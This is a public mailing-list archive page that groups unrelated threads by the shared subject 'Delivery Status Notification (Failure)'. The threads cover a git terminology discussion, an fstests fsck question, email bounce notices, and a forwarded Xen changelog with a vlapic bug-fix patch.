> - demilitarise that “dictator/lieutenant” thing and
> - de-religionise that “blessed” thing
> 
> I did not had the feeling that git is “pro military”, or is against
> “non religious” developers/users.

Those are valid concerns, and I value your feedback.

It would probably be a good thing to change this, and you can even do it
yourself: create a Pull Request to change this file:

https://github.com/git/git-scm.com/blob/master/app/views/about/_distributed.html.erb

Looking forward to your enhancements,
Johannes

> 
> Thank you very much,
> 
> Senol Yazici
> 

^ permalink raw reply	[flat|nested] 183+ messages in thread

* RE: Delivery Status Notification (Failure)
  2019-02-18 10:46     ` Senol Yazici
@ 2019-02-18 16:12       ` Randall S. Becker
  2019-02-18 20:59       ` Johannes Schindelin
  1 sibling, 0 replies; 183+ messages in thread
From: Randall S. Becker @ 2019-02-18 16:12 UTC (permalink / raw)
  To: 'Senol Yazici', git

On February 18, 2019 5:47, Senol Yazici
> I just stumbled over following page
> 
> https://git-scm.com/about/distributed
> 
> and was wondering if it is possible to
> 
> - demilitarise that “dictator/lieutenant” thing and
> - de-religionise that “blessed” thing
> 
> I did not had the feeling that git is “pro military”, or is against “non religious”
> developers/users.

I think there is a point here. In some of my customers, we have replaced these terms with the following (the Repository is optional in the second two):

* Blessed: Repository of Record
* Dictator: Committer [Repository]
* Lieutenant: Contributor [Repository]

This seems more closely aligned with the real roles being applied to activities associated with the repositories involved.

Taking a lesson from other Open Source projects, Jenkins has deprecated Master/Slave in favour of Controller/Agent. This seems not only more acceptable to some, but in my view more descriptive. The terms on the page above do not actually make any descriptive sense to a newbie. And confusion could ensue from the dictionary definitions:

* Lieutenant: an aide or representative of another in the performance of duty : assistant (not what that repository is for)
* Dictator: one holding complete autocratic control : a person with unlimited governmental power (not how the git team behaves)
* Blessed: honored in worship : hallowed; of or enjoying happiness (although I can see the happiness part of this one)

Regards,
Randall



^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]   ` <5c657002.1c69fb81.d433c.32ce.GMR@mx.google.com>
@ 2019-02-18 10:46     ` Senol Yazici
  2019-02-18 16:12       ` Randall S. Becker
  2019-02-18 20:59       ` Johannes Schindelin
  0 siblings, 2 replies; 183+ messages in thread
From: Senol Yazici @ 2019-02-18 10:46 UTC (permalink / raw)
  To: git

Hi all,

I just stumbled over following page

https://git-scm.com/about/distributed

and was wondering if it is possible to

- demilitarise that “dictator/lieutenant” thing and
- de-religionise that “blessed” thing

I did not had the feeling that git is “pro military”, or is against
“non religious” developers/users.

Thank you very much,

Senol Yazici

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]               ` <5be228d2.1c69fb81.3ad08.5e76.GMR@mx.google.com>
@ 2018-11-06 23:54                 ` Jayashree Mohan
  0 siblings, 0 replies; 183+ messages in thread
From: Jayashree Mohan @ 2018-11-06 23:54 UTC (permalink / raw)
  To: Dave Chinner
  Cc: Theodore Ts'o, Eryu Guan, fstests,
	Vijaychidambaram Velayudhan Pillai, Amir Goldstein,
	Filipe Manana

> > Can you try adding _check_scratch_fs after each test case?  Yes, it
>
> _check_scratch_fs now runs xfs_scrub on XFS as well as xfs_repair,
> so it's actually quite expensive.
>
> The whole point of aggregating all these tests into one fstest is to
> avoid the overhead of running _check_scratch_fs after every single
> test that are /extremely unlikely/ to fail on existing filesystems.


Filipe and Eryu suggest that we run _check_scratch_fs after each
subtest. Quoting Filipe,


>
> For this type of tests, I think it's a good idea to let fsck run.
>
> Even if all of the links are persisted, the log/journal replay might
> have caused metadata inconsistencies in the fs for example - this was
> true for many cases I fixed over the years in btrfs.
> Even if fsck doesn't report any problem now, it's still good to run
> it, to help prevent future regressions.
>
> Plus this test creates a very small fs, it's not like fsck will take a
> significant time to run.
> So for all these reasons I would unmount and fsck after each test.


For this reason, we currently _check_scratch_fs after each subtest in
the _check_consistency method in my patch.
+       _unmount_flakey
+       _check_scratch_fs $FLAKEY_DEV
+       [ $? -ne 0 ] && _fatal "fsck failed"

Running on a 200MB partition, addition of this check added only around
3-4 seconds of delay in total for this patch consisting of 37 tests.
Currently this patch takes about 12-15 seconds to run to completion on
my 200MB partition.
Am I missing something - is this the check you are talking about?

Thanks,
Jayashree Mohan

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]   ` <001a1148fe243ade02055ead2599@google.com>
@ 2017-11-23 21:41     ` Igor Djordjevic
  0 siblings, 0 replies; 183+ messages in thread
From: Igor Djordjevic @ 2017-11-23 21:41 UTC (permalink / raw)
  To: git

On 23/11/2017 22:30, Mail Delivery Subsystem wrote:
> Hello igor.d.djordjevic@gmail.com,
> 
> We're writing to let you know that the group you tried to contact (git-for-windows) may not exist, or you may not have permission to post messages to the group. A few more details on why you weren't able to post:
> 
>  * You might have spelled or formatted the group name incorrectly.
>  * The owner of the group may have removed this group.
>  * You may need to join the group before receiving permission to post.
>  * This group may not be open to posting.
> 
> If you have questions related to this or any other Google Group, visit the Help Center at https://groups.google.com/support/.
> 
> Thanks,
> 
> Google Groups

Well, seems that +Cc-ing wasn`t the most successful one... :P

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]             ` <59df4db2.8508370a.40c79.2c64.GMRIR@mx.google.com>
@ 2017-10-12 11:12               ` Nick Gilmour
  0 siblings, 0 replies; 183+ messages in thread
From: Nick Gilmour @ 2017-10-12 11:12 UTC (permalink / raw)
  To: Chris Murphy; +Cc: Liu Bo, Btrfs BTRFS

Thanks for the detailed description!

It makes all sense. My question was rather stupid.

I shrunk the partition with gparted (I suppose it uses the btrfs
resize command) and then cloned the partition with clonezilla. I tried
to create a zvol of the same size but I got an error about the size (I
don't remember exactly), so I used qemu to expand the img. Then
imported the zvol into VMM and started the VM but I got again a blue
screen with the same error. After that I gave up and created a new VM.

Regards,
Nick

On Thu, Oct 12, 2017 at 1:10 PM, Mail Delivery Subsystem
<mailer-daemon@googlemail.com> wrote:
> Message may contain a virus
>
> Your message wasn't delivered to linux-btrfs@vger.kernel.org because it may
> contain a virus. Learn how to check for and prevent viruses.
> The response from the remote server was:
>
> 550 5.7.1 Content-Policy reject msg: The message contains HTML subpart,
> therefore we consider it SPAM or Outlook Virus. TEXT/PLAIN is accepted.!
> BF:<U 0.499737>; S1751350AbdJLLKl
>
>
> Final-Recipient: rfc822; linux-btrfs@vger.kernel.org
> Action: failed
> Status: 5.7.1
> Remote-MTA: dns; vger.kernel.org. (209.132.180.67, the server for the domain
> vger.kernel.org.)
> Diagnostic-Code: smtp; 550 5.7.1 Content-Policy reject msg: The message
> contains HTML subpart, therefore we consider it SPAM or Outlook Virus.
> TEXT/PLAIN is accepted.! BF:<U 0.499737>; S1751350AbdJLLKl
> Last-Attempt-Date: Thu, 12 Oct 2017 04:10:42 -0700 (PDT)
>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2017-06-10 23:36 f4da1594
  0 siblings, 0 replies; 183+ messages in thread
From: f4da1594 @ 2017-06-10 23:36 UTC (permalink / raw)
  To: xen-devel


[-- Attachment #1.1.1.1: Type: text/plain, Size: 178 bytes --]


** Message not delivered **

There was a problem delivering your message to curtiskwong9@gmail.com. See the technical details below.



The response was:

Receive rate too high

[-- Attachment #1.1.1.2: Type: text/html, Size: 1261 bytes --]

[-- Attachment #1.1.2: icon.png --]
[-- Type: image/png, Size: 5747 bytes --]

[-- Attachment #1.2: Type: message/delivery-status, Size: 468 bytes --]

[-- Attachment #1.3: Type: message/global, Size: 10903 bytes --]


4;
        Wed, 07 Jun 2017 16:33:33 -0700 (PDT)
ARC-Seal: i=3D1; a=3Drsa-sha256; t=3D1496878413; cv=3Dnone;
        d=3Dgoogle.com; s=3Darc-20160816;
        b=3DbzXo0NV1Z4Y2x5FNOaC+xh5OueFCTV1WBJ3T+sHlYsHOlqFHpWVsYAiM7xv6zti=
HYm
         /5ZAa8YBLytTgPV0MDmuAr+O6aXJIfda0XxGTTm1p6+JnksBck5D4gYWydVN/X3xgC=
Jr
         apqi0RV1+T780GO9osuHHteL1tdww4u9FGCWlFJ/mWwGjDLkE8kXambkQ/oso5PTWz=
T/
         X0XYD50NWhkBph0rV21l7mDCsXbWNb7lXOjD4+kUyeHCf719EQ/rUpYGgLdOYqqJDA=
dW
         Tzl9mkAc9M+TZXaISM2MDxWjPPpwWYoy1gskacVEmFqB5+8/3r3iy0Tb/+5GlFql6q=
t6
         bzNg=3D=3D
ARC-Message-Signature: i=3D1; a=3Drsa-sha256; c=3Drelaxed/relaxed; d=3Dgoog=
le.com; s=3Darc-20160816;
        h=3Dlist-subscribe:list-help:list-post:list-unsubscribe
         :list-unsubscribe:list-id:precedence:subject:date:message-id:to
         :reply-to:sender:from:content-transfer-encoding:mime-version
         :dkim-signature:delivery-date:arc-authentication-results;
        bh=3D4oyZx10ox9130pHMfEyNpoZnOXBvUw6mgYm7IM9rGsU=3D;
        b=3DrAGL1wcZpI7AoWzkMGsMieEzcHoaoXjhbKrb3RQZtmkZE5shhO1S5KFmEfd/z6p=
uFM
         NnWgL47u0WzXXhR5Ez/IkbUBs4rT6JLsdDvYtPLcjW079n/hfIotjuikAXx1lMJW6e=
MJ
         J/AwvPJHA8PCG56qVd4Vf2HsfqbHzUoLSXTizy3mXBD1zUelq74wb4m7mU/47c9wyA=
6x
         uKcXdcX+mDu9LP1QReJm0W1RUjHneC+5rZr4qGCrLpDPv2N7aWTny0Mi4pB+Al9/ez=
S4
         QqlFByHBnk12f6buN8QQKHdbmAa2K4Yk5zvSDh8sMguwmkQx1y6sCnBIQbCYXE6slX=
f8
         4URA=3D=3D
ARC-Authentication-Results: i=3D1; mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 184.105.182.152 as permitted sender) smtp.mailfrom=3DFWD=
-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEI=
GCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Return-Path: <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHS=
MCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Received: from opayq-out-02.junkemailfilter.com (opayq-out-02.junkemailfilt=
er.com. [184.105.182.152])
        by mx.google.com with ESMTPS id v14si2200005pgb.206.2017.06.07.16.3=
3.33
        for <curtiskwong9@gmail.com>
        (version=3DTLS1_2 cipher=3DECDHE-RSA-AES128-GCM-SHA256 bits=3D128/1=
28);
        Wed, 07 Jun 2017 16:33:33 -0700 (PDT)
Received-SPF: pass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlm=
a2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@o=
payq.com designates 184.105.182.152 as permitted sender) client-ip=3D184.10=
5.182.152;
Authentication-Results: mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 184.105.182.152 as permitted sender) smtp.mailfrom=3DFWD=
-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEI=
GCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Delivery-date: Wed, 07 Jun 2017 16:33:33 -0700
Received: from smtp5.opayq.com ([107.22.209.6]:15650) helo=3D[107.22.209.6]
	by opayq-outbound.junkemailfilter.com with esmtps (TLSv1.2:AES256-SHA256:2=
56)
	(Exim 4.89)
	id 1dIkSD-0007gn-4W on interface=3D184.105.182.150
	for curtiskwong9@gmail.com; Wed, 07 Jun 2017 16:33:33 -0700
DKIM-Signature: v=3D1; d=3Dopayq.com; t=3D1496878412; b=3DBk/cTrbhms8vVcJY5=
JCkFKw8BvjJVpcz1ZMvbDRBd+UllrXBx3w4dOfJ/PE+y09zoW8wD5nb+jtobETPKBh9eOlsiROR=
gGSoLDOOhAvt5jNWVbQ2U3mr4VQKG+knB1s03NiHE5uiPrW0zMnsZm4Q6gIHF1glyFcVylfqg5u=
E3AQ=3D; s=3Dabine; c=3Drelaxed/relaxed; a=3Drsa-sha256; bh=3D4oyZx10ox9130=
pHMfEyNpoZnOXBvUw6mgYm7IM9rGsU=3D; h=3DDate:From:Reply-To:Subject:To:List-U=
nsubscribe;
MIME-Version: 1.0
Content-Type: text/plain; charset=3D"utf-8"
Content-Transfer-Encoding: 7bit
X-GetAbine-Processed: 1
From: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJ=
DLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Sender: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHEC=
CJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com=
>
Reply-To:=20
	FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UAN=
QUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com
To: f4da1594@opayq.com
X-GetAbine-Sender: xen-changelog-bounces@lists.xen.org
X-GetAbine-Disposable: f4da1594@opayq.com
X-GetAbine-Host-Address: 107.22.209.6
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFlrPLMWRWlGSWpSXmKPExsWS0XRdVde51yL
 S4PcHXYsJ2wwcGD229+1iD2CMYs3MS8qvSGDNuLz8AWvBRbGK9t5VTA2MlwS7GLk4hAS+MEo8
 +PeAtYuRE8g5zyjxvpG5i5GDg01ATGLuXgWQsIiAqsSsFcuZIUrUJZp+N7CBlAgL+Emc7XEFC
 fMKmEmcfNnCAmKzAJV/2vaIeQIjxwJGhlWMGsWpRWWpRbrGBnpJRZnpGSW5iZk5uoYGpnq5qc
 XFiempOYlJxXrJ+bmbGIEeqWdgYNzBOGGV3yFGSQ4mJVHeCk+LSCG+pPyUyozE4oz4otKc1OJ
 DjDIcHEoSvNu6gXKCRanpqRVpmTnA0IBJS3DwKInw/qgDSvMWFyTmFmemQ6ROMSpKifOy9wAl
 BEASGaV5cG2wcLzEKCslzMvIwMAgxFOQWpSbWYIq/4pRnINRSZhXBWQKT2ZeCdz0V0CLmYAW8
 10yAVlckoiQkmpg1LmZ+mT34gnCp79OjDs+e0vU2xcH556/kFNrcOb91lkdKRf2qgcq+Z74rX
 BUYrmdWdSN21lSAfv/+nx7yBb9M3aV7zMfreuKVpVx1a+C+HfXWezScthxa/XUmArz38X5iWU
 vDFhstpm6/nu84ui56idSeo7zYhrWrJ3O6VzO9vrd76mbzkxeyarEUpyRaKjFXFScCACW1lVH
 QgIAAA=3D=3D
X-Env-Sender: ian.jackson@eu.citrix.com
X-Msg-Ref: server-3.tower-206.messagelabs.com!1496878402!98762148!1
X-Originating-IP: [104.130.215.37]
X-SpamReason: No, hits=3D0.5 required=3D7.0 tests=3DBODY_RANDOM_LONG
X-StarScan-Received:=20
X-StarScan-Version: 9.4.19; banners=3D-,-,-
X-VirusChecked: Checked
Message-Id: <E1dIkS2-0003y3-HK@xenbits.xenproject.org>
Date: Wed, 07 Jun 2017 23:33:22 +0000
Subject: [Xen-changelog] [xen master] x86/vlapic: fix two flaws in emulatin=
g
	MSR_IA32_APICBASE
X-BeenThere: xen-changelog@lists.xen.org
X-Mailman-Version: 2.1.18
Precedence: list
List-Id: "Change log for Mercurial \(receive only\)"
 <xen-changelog.lists.xen.org>
List-Unsubscribe: <https://lists.xen.org/cgi-bin/mailman/options/xen-change=
log>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dunsubscribe>
List-Unsubscribe: <mailto:unsubscribe-1188110264-f4da1594@opayq.com>, <http=
s://emails.abine.com/disableDisposable?fwd=3DFWD-737QHYSMHVAYQAUCAOIQBDAAGA=
QLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=
=3D@opayq.com>
List-Post: <mailto:xen-changelog@lists.xen.org>
List-Help: <mailto:xen-changelog-request@lists.xen.org?subject=3Dhelp>
List-Subscribe: <https://lists.xen.org/cgi-bin/mailman/listinfo/xen-changel=
og>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dsubscribe>
X-Sender-Domain: xenproject.org
X-Spamfilter-host: plato.junkemailfilter.com - http://www.junkemailfilter.c=
om
X-Key-ID: ZjRkYTE1OTRAb3BheXEuY29tIHhlbi1jaGFuZ2Vsb2ctYm91bmNlc0BsaXN0cy54Z=
W4ub3JnIDIwMTctMDYtMDcgMTY6MzM6MjcgMWRJa1M3LTAwMDdJNi1Geg=3D=3D
X-Mail-from: xen-changelog-bounces@lists.xen.org
X-Sender-Host-Address: 192.237.175.120
X-Sender-Host-Name: lists.xenproject.org
X-Key-ID: Y3VydGlza3dvbmc5QGdtYWlsLmNvbSBmd2QtNzM3cWh5c21odmF5cWF1Y2FvaXFiZ=
GFhZ2FxbG1hMnlhbWhlY2NqZGxpYmF5YXd5YWtpYXphcWhzbWNjd21ibGlhNHVhbnF1ZWlnY2lt=
YmttYXp1ejRhYWVhYWNhPT09QG9wYXlxLmNvbSAyMDE3LTA2LTA3IDE2OjMzOjMzIDFkSWtTRC0=
wMDA3Z24tNFc=3D


-------------------------Blur-------------------------
This email is forwarded from a MASKED EMAIL you created using Blur.  (https=
://dnt.abine.com/#help/faq/faq-whataremaskedemails).
IF THIS IS SPAM, CLICK HERE TO BLOCK:
https://dnt.abine.com/#/block_email/f4da1594@opayq.com/FWD-737QHYSMHVAYQAUC=
AOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAA=
CA=3D=3D=3D@opayq.com

Want to shop safely and privately online? Go Premium: https://dnt.abine.com=
/?pk_campaign=3DmaskHeader#premium
-------------------------by Abine-------------------------


commit 4f35cb80e8813053d1cec9dc1654ceb6dd7575a0
Author:     Chao Gao <chao.gao@intel.com>
AuthorDate: Tue Jun 6 14:34:30 2017 +0200
Commit:     Jan Beulich <jbeulich@suse.com>
CommitDate: Tue Jun 6 14:34:30 2017 +0200

    x86/vlapic: fix two flaws in emulating MSR_IA32_APICBASE
   =20
    According to SDM Chapter ADVANCED PROGRAMMABLE INTERRUPT CONTROLLER (AP=
IC)
    -> Extended XAPIC (x2APIC) -> x2APIC State Transitions, The existing co=
de to
    handle guest's writing MSR_IA32_APICBASE has two flaws:
    1. Transition from x2APIC Mode to Disabled Mode is allowed but wrongly
    disabled currently. Fix it by removing the related check.
    2. Transition from x2APIC Mode to xAPIC Mode is illegal but wrongly all=
owed
    currently. Considering changing ENABLE bit of the MSR has been handled,
    it can be fixed by only allowing transition from xAPIC Mode to x2APIC M=
ode
    (the other two transitions: from x2APIC mode to xAPIC Mode, from disabl=
ed mode
    to invalid state (EN=3D0, EXTD=3D1) are disabled).
   =20
    Signed-off-by: Chao Gao <chao.gao@intel.com>
    Reviewed-by: Jan Beulich <jbeulich@suse.com>
---
 xen/arch/x86/hvm/vlapic.c        | 6 ++----
 xen/include/asm-x86/hvm/vlapic.h | 4 ++++
 2 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/xen/arch/x86/hvm/vlapic.c b/xen/arch/x86/hvm/vlapic.c
index cf8ee50..4320c6e 100644
--- a/xen/arch/x86/hvm/vlapic.c
+++ b/xen/arch/x86/hvm/vlapic.c
@@ -1003,14 +1003,12 @@ bool_t vlapic_msr_set(struct vlapic *vlapic, uint64=
_t value)
         }
         else
         {
-            if ( unlikely(vlapic_x2apic_mode(vlapic)) )
-                return 0;
             vlapic->hw.disabled |=3D VLAPIC_HW_DISABLED;
             pt_may_unmask_irq(vlapic_domain(vlapic), NULL);
         }
     }
-    else if ( !(value & MSR_IA32_APICBASE_ENABLE) &&
-              unlikely(value & MSR_IA32_APICBASE_EXTD) )
+    else if ( ((vlapic->hw.apic_base_msr ^ value) & MSR_IA32_APICBASE_EXTD=
) &&
+              unlikely(!vlapic_xapic_mode(vlapic)) )
         return 0;
=20
     vlapic->hw.apic_base_msr =3D value;
diff --git a/xen/include/asm-x86/hvm/vlapic.h b/xen/include/asm-x86/hvm/vla=
pic.h
index 4656293..a63fcd5 100644
--- a/xen/include/asm-x86/hvm/vlapic.h
+++ b/xen/include/asm-x86/hvm/vlapic.h
@@ -51,8 +51,12 @@
=20
 #define vlapic_base_address(vlapic)                             \
     ((vlapic)->hw.apic_base_msr & MSR_IA32_APICBASE_BASE)
+/* Only check EXTD bit as EXTD can't be set if it is disabled by hardware =
*/
 #define vlapic_x2apic_mode(vlapic)                              \
     ((vlapic)->hw.apic_base_msr & MSR_IA32_APICBASE_EXTD)
+#define vlapic_xapic_mode(vlapic)                               \
+    (!vlapic_hw_disabled(vlapic) && \
+     !((vlapic)->hw.apic_base_msr & MSR_IA32_APICBASE_EXTD))
=20
 /*
  * Generic APIC bitmap vector update & search routines.
--
generated by git-patchbot for /home/xen/git/xen.git#master

_______________________________________________
Xen-changelog mailing list
Xen-changelog@lists.xen.org
https://lists.xenproject.org/xen-changelog

[-- Attachment #2: Type: text/plain, Size: 127 bytes --]

_______________________________________________
Xen-devel mailing list
Xen-devel@lists.xen.org
https://lists.xen.org/xen-devel

^ permalink raw reply related	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2017-06-09  8:26 f4da1594
  0 siblings, 0 replies; 183+ messages in thread
From: f4da1594 @ 2017-06-09  8:26 UTC (permalink / raw)
  To: xen-devel


[-- Attachment #1.1.1.1: Type: text/plain, Size: 137 bytes --]


** Message not delivered **

There was a problem delivering your message to curtiskwong9@gmail.com. See the technical details below.




[-- Attachment #1.1.1.2: Type: text/html, Size: 1177 bytes --]

[-- Attachment #1.1.2: icon.png --]
[-- Type: image/png, Size: 5747 bytes --]

[-- Attachment #1.2: Type: message/delivery-status, Size: 423 bytes --]

[-- Attachment #1.3: Type: message/global, Size: 9462 bytes --]


;
        Mon, 05 Jun 2017 23:23:23 -0700 (PDT)
ARC-Seal: i=3D1; a=3Drsa-sha256; t=3D1496730203; cv=3Dnone;
        d=3Dgoogle.com; s=3Darc-20160816;
        b=3DP0Rc0pDub58RdfcWf7/cVjaUmvBEGvjPs6J+zrwl0i43I96VQ3AsoicbSxN38Ec=
na+
         Qq6nAaubrOCQfseSUVavEZIS1Zfw1cixIvI/H6gcQnaKCJdPpY5f38hbljWNUnv4MH=
t8
         iwS2cb+XvbyKDIQXmADo7pk5TO/BhJfx/BuWvlYmOzd1/56mHW8ZWXh1fle3d3H0Cz=
+L
         yuzBgz2eUKKD+1pvNtZ+wE0sWq31fnc3jkwC4nSjPayugXDegOHGAR7mKnc9bjf97i=
vk
         oNYI8qZe21q9j0X4DRnXt1Jd7qTwOS6FI1oU+VkfmuM0dOHihyWXXabjMkbQE3ToWq=
jR
         NaVw=3D=3D
ARC-Message-Signature: i=3D1; a=3Drsa-sha256; c=3Drelaxed/relaxed; d=3Dgoog=
le.com; s=3Darc-20160816;
        h=3Dlist-subscribe:list-help:list-post:list-unsubscribe
         :list-unsubscribe:list-id:precedence:subject:date:message-id:to
         :reply-to:sender:from:content-transfer-encoding:mime-version
         :dkim-signature:delivery-date:arc-authentication-results;
        bh=3DW5ERQhfuI7BVlnxiTwiniOMiwAuPBL4fVRQN54Ovr28=3D;
        b=3Dogx0n0+P49V0rV9ZjrEk4WlPGmMfBOu5vlp3hSeNrj+xplZTysBvKcdE+r8lwt+=
9Y6
         ZMPeDsEdJZGtagEWQDeAGaiplQ9l2AQkVE8lEwqCc7Ak9GyWfGjB/7mMGrPEZbFuyS=
Uh
         wVL8SKZIu4O7po7aV8BDh04gdb5zq8kKZ8WJW+nUiGc3gq3iKlsOc0rSIjI3VYucCb=
ZR
         ilfGODuAKfkpv4KedquFY9nBfW9tpwf7rekVI5IkITMlswxCDe25WGVZN44XTOc6GT=
LU
         TA3Wky00Y9sIBGAZnRrTlPAQ6xEo2dA2YSE4Mc2KSBoonoJlSYpm47pViXokUn2ipH=
fS
         pJiw=3D=3D
ARC-Authentication-Results: i=3D1; mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 69.50.231.162 as permitted sender) smtp.mailfrom=3DFWD-7=
37QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGC=
IMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Return-Path: <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHS=
MCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Received: from smtp162.junkemailfilter.com (smtp162.junkemailfilter.com. [6=
9.50.231.162])
        by mx.google.com with ESMTPS id r27si8848139pfg.100.2017.06.05.23.2=
3.23
        for <curtiskwong9@gmail.com>
        (version=3DTLS1_2 cipher=3DECDHE-RSA-AES128-GCM-SHA256 bits=3D128/1=
28);
        Mon, 05 Jun 2017 23:23:23 -0700 (PDT)
Received-SPF: pass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlm=
a2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@o=
payq.com designates 69.50.231.162 as permitted sender) client-ip=3D69.50.23=
1.162;
Authentication-Results: mx.google.com;
       dkim=3Dpass header.i=3D@opayq.com;
       spf=3Dpass (google.com: domain of fwd-737qhysmhvayqaucaoiqbdaagaqlma=
2yamheccjdlibayawyakiazaqhsmccwmblia4uanqueigcimbkmazuz4aaeaaca=3D=3D=3D@op=
ayq.com designates 69.50.231.162 as permitted sender) smtp.mailfrom=3DFWD-7=
37QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGC=
IMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com;
       dmarc=3Dpass (p=3DNONE sp=3DNONE dis=3DNONE) header.from=3Dopayq.com
Delivery-date: Mon, 05 Jun 2017 23:23:23 -0700
Received: from opayq-out-07.junkemailfilter.com ([184.105.182.157]:54618) h=
elo=3Dopayq-out-07.junkemailfilter.com
	by outscan-backup.junkemailfilter.com with esmtps (TLSv1.2:ECDHE-RSA-AES25=
6-GCM-SHA384:256)
	(Exim 4.89)
	id 1dI7ti-0003bQ-RR on interface=3D69.50.231.152
	for curtiskwong9@gmail.com; Mon, 05 Jun 2017 23:23:22 -0700
Received: from smtp3.opayq.com ([23.23.126.237]:7536) helo=3D[23.23.126.237=
]
	by opayq-outbound.junkemailfilter.com with esmtps (TLSv1.2:AES256-SHA256:2=
56)
	(Exim 4.89)
	id 1dI7tD-0000oo-Ab on interface=3D184.105.182.150
	for curtiskwong9@gmail.com; Mon, 05 Jun 2017 23:22:51 -0700
DKIM-Signature: v=3D1; d=3Dopayq.com; t=3D1496730170; b=3DWQg7GluH13TIgQt1R=
vRPc4ZbjZmcYbapUL/siQ/KDfpeJh3tNHRXCWZedZpb9DI13j/RrxiEd9DaDeLOmZ+rEGuBv1VA=
eSLcvD67az9e0Ph2cqbVP9WMx+DuTiCuBN6tj77SHF6VECcPwMLkgc7jDAOtCHvQafAgO3+r10q=
wkYc=3D; s=3Dabine; c=3Drelaxed/relaxed; a=3Drsa-sha256; bh=3DW5ERQhfuI7BVl=
nxiTwiniOMiwAuPBL4fVRQN54Ovr28=3D; h=3DDate:From:Reply-To:Subject:To:List-U=
nsubscribe;
MIME-Version: 1.0
Content-Type: text/plain; charset=3D"utf-8"
Content-Transfer-Encoding: 7bit
X-GetAbine-Processed: 1
From: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJ=
DLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com>
Sender: "lists.xen.org [Masked]" <FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHEC=
CJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com=
>
Reply-To:=20
	FWD-737QHYSMHVAYQAUCAOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UAN=
QUEIGCIMBKMAZUZ4AAEAACA=3D=3D=3D@opayq.com
To: f4da1594@opayq.com
X-GetAbine-Sender: xen-changelog-bounces@lists.xen.org
X-GetAbine-Disposable: f4da1594@opayq.com
